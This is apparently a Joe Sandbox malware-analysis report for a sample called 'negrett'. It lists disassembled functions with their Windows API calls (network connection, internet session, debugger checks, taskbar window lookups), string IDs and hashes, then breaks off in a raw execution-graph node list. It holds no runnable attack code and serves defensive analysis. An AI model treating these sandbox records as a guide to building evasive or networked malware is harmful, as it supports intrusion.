                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $ZL
                                                • API String ID: 0-3552672294
                                                • Opcode ID: 5f4b0bf46cdb33aff3f6cf388ae02dd567b21fd811a3edf0408685ce73b227fd
                                                • Instruction ID: 2acf8e04cd07f2dc7f640216b09b89c1114f87f9ccff9e2963db8eac741ef1ef
                                                • Opcode Fuzzy Hash: 5f4b0bf46cdb33aff3f6cf388ae02dd567b21fd811a3edf0408685ce73b227fd
                                                • Instruction Fuzzy Hash: 2D81BC71900209AFDF229FA4CD89FEE7BB9EF04708F14403AF914A21A0DB718944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B17620: _wcslen.LIBCMT ref: 00B17625
                                                • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00B84ED4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Connection_wcslen
                                                • String ID: *$LPT
                                                • API String ID: 1725874428-3443410124
                                                • Opcode ID: fefe33c7d892e1c7c7f519e838a2b5c7ef827e05a367e300811cd4ad3b7233a9
                                                • Instruction ID: 86f6e3ec9febffba1889d559ad4656612d15e3470c9e2953f2b9e78c753a3b1a
                                                • Opcode Fuzzy Hash: fefe33c7d892e1c7c7f519e838a2b5c7ef827e05a367e300811cd4ad3b7233a9
                                                • Instruction Fuzzy Hash: 4C913B75A002059FCB14EF58C494EAABBF1EF48304F5980D9E90A9F362DB35ED85CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: \
                                                • API String ID: 176396367-2967466578
                                                • Opcode ID: 787807e1afe6a33cfab8ca21ee33a923b567645059f81b4a1e8a0612646f87ea
                                                • Instruction ID: b6846c2eafb2dc014487f2bfc99337ac9309cad8eb02bea587fe39432a3c43c6
                                                • Opcode Fuzzy Hash: 787807e1afe6a33cfab8ca21ee33a923b567645059f81b4a1e8a0612646f87ea
                                                • Instruction Fuzzy Hash: AB718B714053009EC714EF69ED8096ABBE8FFA5350F80483FF945871A0EBB49948DF69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 00B3E30D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: ErrorHandling__start
                                                • String ID: pow
                                                • API String ID: 3213639722-2276729525
                                                • Opcode ID: 89c45043023f0327c5990733e113d3c4db9d33c60e56d92b1d6e1ff3db5454af
                                                • Instruction ID: 746bce579c3771c143850891b8549b9f0b5ae546ac0d96cf8017ce2f9b0ef592
                                                • Opcode Fuzzy Hash: 89c45043023f0327c5990733e113d3c4db9d33c60e56d92b1d6e1ff3db5454af
                                                • Instruction Fuzzy Hash: 1C513BA1E9C10296CB167728CD417BA3BE8DB40740F344EEAE0E5472E9DF34CD95EA46
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #
                                                • API String ID: 0-1885708031
                                                • Opcode ID: 9856b348d1a97dded2c152494dd15881aa89519e9c1582af26930b4f778da385
                                                • Instruction ID: 6bab4f0c299f55a88c2d2df99696da2846e8ebcf45f96afc8a13d480f85ec68d
                                                • Opcode Fuzzy Hash: 9856b348d1a97dded2c152494dd15881aa89519e9c1582af26930b4f778da385
                                                • Instruction Fuzzy Hash: E5510439500256DFDB15DF68D481AFA7BE8EF15310F6440D5E8A69B2D0DB38DD42CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: :$\
                                                • API String ID: 176396367-1166558509
                                                • Opcode ID: 8393664a22464e4253d7eab9e567e7331e947b0021ede9ca1273046c13f8be72
                                                • Instruction ID: 761b8c5f0a567b62fce2aec0b722b0d8c7a376e8fb2ed56054aca90f2d5a8e01
                                                • Opcode Fuzzy Hash: 8393664a22464e4253d7eab9e567e7331e947b0021ede9ca1273046c13f8be72
                                                • Instruction Fuzzy Hash: 4E317375900149ABDF219BA4DC88FEB77BDEF89704F2041B6FA09D6050EF74D2448B28
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00BA461F
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BA4634
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: '
                                                • API String ID: 3850602802-1997036262
                                                • Opcode ID: 3fd59be2d93305dfc532061ee93eb0322f9848d6af36596bda271ab722231d01
                                                • Instruction ID: f58f179c50b1be5fa65ca20721e9fd5ff038b3b991128518114c18d331c1fcc2
                                                • Opcode Fuzzy Hash: 3fd59be2d93305dfc532061ee93eb0322f9848d6af36596bda271ab722231d01
                                                • Instruction Fuzzy Hash: 55312774A05209AFDF14CFA9C980BDA7BF5FF9A300F1044AAE904AB341D7B0A941CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B8CD7D
                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B8CDA6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Internet$OpenOption
                                                • String ID: <local>
                                                • API String ID: 942729171-4266983199
                                                • Opcode ID: d63a2098f2c174496c6d66a031249e62990cd0d0d800044108fb0cb8acd9c984
                                                • Instruction ID: da2f624db1c7586724e25a6c1b4c67eedf4ea77a5339044dc9405540e84cfb2b
                                                • Opcode Fuzzy Hash: d63a2098f2c174496c6d66a031249e62990cd0d0d800044108fb0cb8acd9c984
                                                • Instruction Fuzzy Hash: 9F11C6B1205631BAD7347B668C85EE7BEECEF127A4F1042B6B119831A0D7709841D7F0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B19CB3: _wcslen.LIBCMT ref: 00B19CBD
                                                • CharUpperBuffW.USER32(?,?), ref: 00B76CB6
                                                • _wcslen.LIBCMT ref: 00B76CC2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen$BuffCharUpper
                                                • String ID: STOP
                                                • API String ID: 1256254125-2411985666
                                                • Opcode ID: 07e5a36210816a2744c42d5d6462002aaf007c2dd2721fde5d4e0856e42f2669
                                                • Instruction ID: 44b2b40c5b3984a961d3894ce3ed58ee0d92c36feb11a41ad9fae34cd77b4b6c
                                                • Opcode Fuzzy Hash: 07e5a36210816a2744c42d5d6462002aaf007c2dd2721fde5d4e0856e42f2669
                                                • Instruction Fuzzy Hash: 22012233A1092A8BCB21AFBDCC809FF77F4EB61710B5049B8E87697190EB31D940C650
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Message
                                                • String ID: AutoIt$Error allocating memory.
                                                • API String ID: 2030045667-4017498283
                                                • Opcode ID: 2357751689c210d45cc9ad5fd4cc1b0596877c8711303fe58bda80f2b9cc8299
                                                • Instruction ID: dc01ba3bdd1ee8881b0a0249e41d07b5c6e75701e03a4e095ab5b975e86c8a9d
                                                • Opcode Fuzzy Hash: 2357751689c210d45cc9ad5fd4cc1b0596877c8711303fe58bda80f2b9cc8299
                                                • Instruction Fuzzy Hash: ECE0923224832826D21536547C03F897AC48F06B60F1004F7FB5C555D39EE1689046A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B2F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B30D71,?,?,?,00B1100A), ref: 00B2F7CE
                                                • IsDebuggerPresent.KERNEL32(?,?,?,00B1100A), ref: 00B30D75
                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B1100A), ref: 00B30D84
                                                Strings
                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B30D7F
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                • API String ID: 55579361-631824599
                                                • Opcode ID: f5cf4fb73df4a24eb91f957857c6d0a48ff2722d1acc6e25ee764a9daa2a3172
                                                • Instruction ID: 5a17c38062e626c5d5567ef01525a34ed06b7b14d54834d8b6b63d451103d95b
                                                • Opcode Fuzzy Hash: f5cf4fb73df4a24eb91f957857c6d0a48ff2722d1acc6e25ee764a9daa2a3172
                                                • Instruction Fuzzy Hash: ECE092702003528BD330AFBCE4183967BE0AF05740F108ABDE886C7665DBB0E4848B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 029ED7D5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: 0%M$8%M
                                                • API String ID: 1385522511-666571738
                                                • Opcode ID: 36b27be9e0a83e9aa98581938c918848fc8ca54e9c586360ab56cc84b83fe9f2
                                                • Instruction ID: 061a90423d87063900d7c0366e748bb5f15d16caa99dac11c6035e5f5af005e2
                                                • Opcode Fuzzy Hash: 36b27be9e0a83e9aa98581938c918848fc8ca54e9c586360ab56cc84b83fe9f2
                                                • Instruction Fuzzy Hash: CCE026B1001A10ABCE07A718BAB4E8A335EBB56320B9012F7D003866909B651441CA6C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindWindowW.USER32 ref: 00BA232C
                                                • PostMessageW.USER32 ref: 00BA233F
                                                  • Part of subcall function 00B7E97B: Sleep.KERNEL32 ref: 00B7E9F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                • Opcode ID: e56ce817e583245e130742fd00e4bbd4058162420605d1f813120a410d121393
                                                • Instruction ID: 3b2415471ab3f80309f555fdecf17d3c9a620e731359f86781d10d61f49f709b
                                                • Opcode Fuzzy Hash: e56ce817e583245e130742fd00e4bbd4058162420605d1f813120a410d121393
                                                • Instruction Fuzzy Hash: CCD01236794310B7E664B770DC0FFCABE54AF15B10F0049567769AB1E0DDF0A801CA54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FindWindowW.USER32 ref: 00BA236C
                                                • PostMessageW.USER32 ref: 00BA2373
                                                  • Part of subcall function 00B7E97B: Sleep.KERNEL32 ref: 00B7E9F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                • Opcode ID: b5c9e63619adf448fdd093a1f218cdfb368ff654cbc78d8a91ee0c7390a6d2ae
                                                • Instruction ID: e83aa42ee0905d78456f98cc8273a53ace65a9d9b97dfd74bef7f578781c0e49
                                                • Opcode Fuzzy Hash: b5c9e63619adf448fdd093a1f218cdfb368ff654cbc78d8a91ee0c7390a6d2ae
                                                • Instruction Fuzzy Hash: 37D0C9327813107AE664A7709C0FFCAAA54AB16B10F4049567765AB1E0D9B0A8018A54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:3.6%
                                                Dynamic/Decrypted Code Coverage:0.4%
                                                Signature Coverage:0%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:67
                                                execution_graph 96708 1028402 96713 10281be 96708->96713 96711 102842a 96719 10281ef try_get_first_available_module 96713->96719 96714 1028338 96718 1028343 96714->96718 96731 101f2d9 20 API calls _abort 96714->96731 96716 10283ee 96732 10227ec 26 API calls pre_c_initialization 96716->96732 96718->96711 96725 1030984 96718->96725 96719->96714 96728 1018e0b 40 API calls 2 library calls 96719->96728 96721 102838c 96721->96714 96729 1018e0b 40 API calls 2 library calls 96721->96729 96723 10283ab 96723->96714 96730 1018e0b 40 API calls 2 library calls 96723->96730 96733 1030081 96725->96733 96727 103099f 96727->96711 96728->96721 96729->96723 96730->96714 96731->96716 96732->96718 96736 103008d ___scrt_is_nonwritable_in_current_image 96733->96736 96734 103009b 96791 101f2d9 20 API calls _abort 96734->96791 96736->96734 96738 10300d4 96736->96738 96737 10300a0 96792 10227ec 26 API calls pre_c_initialization 96737->96792 96744 103065b 96738->96744 96743 10300aa __wsopen_s 96743->96727 96794 103042f 96744->96794 96747 10306a6 96812 1025221 96747->96812 96748 103068d 96826 101f2c6 20 API calls _abort 96748->96826 96751 10306ab 96752 10306b4 96751->96752 96753 10306cb 96751->96753 96828 101f2c6 20 API calls _abort 96752->96828 96825 103039a CreateFileW 96753->96825 96757 10306b9 96829 101f2d9 20 API calls _abort 96757->96829 96759 1030781 GetFileType 96761 103078c GetLastError 96759->96761 96766 10307d3 96759->96766 96760 1030756 GetLastError 96831 101f2a3 20 API calls __dosmaperr 96760->96831 96832 101f2a3 20 API calls __dosmaperr 96761->96832 96762 1030704 96762->96759 96762->96760 96830 103039a CreateFileW 96762->96830 96765 103079a CloseHandle 96768 1030692 96765->96768 96769 10307c3 96765->96769 96834 102516a 21 API calls 2 library calls 96766->96834 96827 101f2d9 20 API calls _abort 96768->96827 96833 101f2d9 20 API calls _abort 96769->96833 96771 1030749 96771->96759 96771->96760 96773 10307f4 96775 1030840 96773->96775 96835 10305ab 72 API calls 3 library calls 96773->96835 96774 10307c8 96774->96768 96780 103086d 96775->96780 96836 103014d 72 API calls 4 library calls 96775->96836 96778 1030866 96779 103087e 96778->96779 96778->96780 96782 10300f8 96779->96782 96783 10308fc CloseHandle 96779->96783 96837 10286ae 96780->96837 96793 1030121 LeaveCriticalSection __wsopen_s 96782->96793 96852 103039a CreateFileW 96783->96852 96785 1030927 96786 103095d 96785->96786 96787 1030931 GetLastError 96785->96787 96786->96782 96853 101f2a3 20 API calls __dosmaperr 96787->96853 96789 103093d 96854 1025333 21 API calls 2 library calls 96789->96854 96791->96737 96792->96743 96793->96743 96795 1030450 96794->96795 96796 103046a 96794->96796 96795->96796 96862 101f2d9 20 API calls _abort 96795->96862 96855 10303bf 96796->96855 96799 103045f 96863 10227ec 26 API calls pre_c_initialization 96799->96863 96801 10304d1 96809 1030524 96801->96809 96866 101d70d 26 API calls 2 library calls 96801->96866 96802 10304a2 96802->96801 96864 101f2d9 20 API calls _abort 96802->96864 96805 103051f 96807 103059e 96805->96807 96805->96809 96806 10304c6 96865 10227ec 26 API calls pre_c_initialization 96806->96865 96867 10227fc 11 API calls _abort 96807->96867 96809->96747 96809->96748 96811 10305aa 96813 102522d ___scrt_is_nonwritable_in_current_image 96812->96813 96870 1022f5e EnterCriticalSection 96813->96870 96815 1025234 96816 1025259 96815->96816 96821 10252c7 EnterCriticalSection 96815->96821 96823 102527b 96815->96823 96874 1025000 96816->96874 96819 10252a4 __wsopen_s 96819->96751 96822 10252d4 LeaveCriticalSection 96821->96822 96821->96823 96822->96815 96871 102532a 96823->96871 96825->96762 96826->96768 96827->96782 96828->96757 96829->96768 96830->96771 96831->96768 96832->96765 96833->96774 96834->96773 96835->96775 96836->96778 96900 10253c4 96837->96900 96839 10286c4 96913 1025333 21 API calls 2 library calls 96839->96913 96840 10286be 96840->96839 96841 10286f6 96840->96841 96843 10253c4 __wsopen_s 26 API calls 96840->96843 96841->96839 96844 10253c4 __wsopen_s 26 API calls 96841->96844 96846 10286ed 96843->96846 96847 1028702 CloseHandle 96844->96847 96845 102871c 96848 102873e 96845->96848 96914 101f2a3 20 API calls __dosmaperr 96845->96914 96850 10253c4 __wsopen_s 26 API calls 96846->96850 96847->96839 96851 102870e GetLastError 96847->96851 96848->96782 96850->96841 96851->96839 96852->96785 96853->96789 96854->96786 96856 10303d7 96855->96856 96857 10303f2 96856->96857 96868 101f2d9 20 API calls _abort 96856->96868 96857->96802 96859 1030416 96869 10227ec 26 API calls pre_c_initialization 96859->96869 96861 1030421 96861->96802 96862->96799 96863->96796 96864->96806 96865->96801 96866->96805 96867->96811 96868->96859 96869->96861 96870->96815 96882 1022fa6 LeaveCriticalSection 96871->96882 96873 1025331 96873->96819 96883 1024c7d 96874->96883 96876 1025012 96880 102501f 96876->96880 96890 1023405 11 API calls 2 library calls 96876->96890 96879 1025071 96879->96823 96881 1025147 EnterCriticalSection 96879->96881 96891 10229c8 96880->96891 96881->96823 96882->96873 96888 1024c8a FindHandlerForForeignException 96883->96888 96884 1024cca 96898 101f2d9 20 API calls _abort 96884->96898 96885 1024cb5 RtlAllocateHeap 96886 1024cc8 96885->96886 96885->96888 96886->96876 96888->96884 96888->96885 96897 1014ead 7 API calls 2 library calls 96888->96897 96890->96876 96892 10229d3 HeapFree 96891->96892 96896 10229fc __dosmaperr 96891->96896 96893 10229e8 96892->96893 96892->96896 96899 101f2d9 20 API calls _abort 96893->96899 96895 10229ee GetLastError 96895->96896 96896->96879 96897->96888 96898->96886 96899->96895 96901 10253d1 96900->96901 96902 10253e6 96900->96902 96915 101f2c6 20 API calls _abort 96901->96915 96908 102540b 96902->96908 96917 101f2c6 20 API calls _abort 96902->96917 96904 10253d6 96916 101f2d9 20 API calls _abort 96904->96916 96906 1025416 96918 101f2d9 20 API calls _abort 96906->96918 96908->96840 96910 102541e 96919 10227ec 26 API calls pre_c_initialization 96910->96919 96911 10253de 96911->96840 96913->96845 96914->96848 96915->96904 96916->96911 96917->96906 96918->96910 96919->96911 96920 fff7bf 96921 fffcb6 96920->96921 96922 fff7d3 96920->96922 97027 ffaceb 23 API calls messages 96921->97027 96924 fffcc2 96922->96924 96955 100fddb 96922->96955 97028 ffaceb 23 API calls messages 96924->97028 96927 fff7e5 96927->96924 96928 fff83e 96927->96928 96929 fffd3d 96927->96929 96952 ffed9d messages 96928->96952 96965 1001310 96928->96965 97029 1061155 22 API calls 96929->97029 96933 fffef7 96938 ffa8c7 22 API calls 96933->96938 96933->96952 96935 1044600 96935->96952 97030 ffa8c7 96935->97030 96936 1044b0b 97035 106359c 82 API calls __wsopen_s 96936->97035 96937 ffa8c7 22 API calls 96951 ffec76 messages 96937->96951 96938->96952 96943 1010242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96943->96951 96944 fffbe3 96947 1044bdc 96944->96947 96944->96952 96954 fff3ae messages 96944->96954 96945 ffa961 22 API calls 96945->96951 96946 10100a3 29 API calls pre_c_initialization 96946->96951 97036 106359c 82 API calls __wsopen_s 96947->97036 96949 1044beb 97037 106359c 82 API calls __wsopen_s 96949->97037 96950 100fddb 22 API calls 96950->96951 96951->96933 96951->96935 96951->96936 96951->96937 96951->96943 96951->96944 96951->96945 96951->96946 96951->96949 96951->96950 96951->96952 96953 10101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96951->96953 96951->96954 97025 10001e0 256 API calls 2 library calls 96951->97025 97026 10006a0 41 API calls messages 96951->97026 96953->96951 96954->96952 97034 106359c 82 API calls __wsopen_s 96954->97034 96957 100fde0 96955->96957 96958 100fdfa 96957->96958 96961 100fdfc 96957->96961 97038 101ea0c 96957->97038 97045 1014ead 7 API calls 2 library calls 96957->97045 96958->96927 96960 101066d 97047 10132a4 RaiseException 96960->97047 96961->96960 97046 10132a4 RaiseException 96961->97046 96964 101068a 96964->96927 96966 10017b0 96965->96966 96967 1001376 96965->96967 97349 1010242 5 API calls __Init_thread_wait 96966->97349 96968 1001390 96967->96968 96969 1046331 96967->96969 97050 1001940 96968->97050 96972 104633d 96969->96972 97360 107709c 256 API calls 96969->97360 96972->96951 96974 10017ba 96976 10017fb 96974->96976 97350 ff9cb3 96974->97350 96980 1046346 96976->96980 96982 100182c 96976->96982 96977 1001940 9 API calls 96979 10013b6 96977->96979 96979->96976 96981 10013ec 96979->96981 97361 106359c 82 API calls __wsopen_s 96980->97361 96981->96980 96996 1001408 __fread_nolock 96981->96996 97357 ffaceb 23 API calls messages 96982->97357 96985 10017d4 97356 10101f8 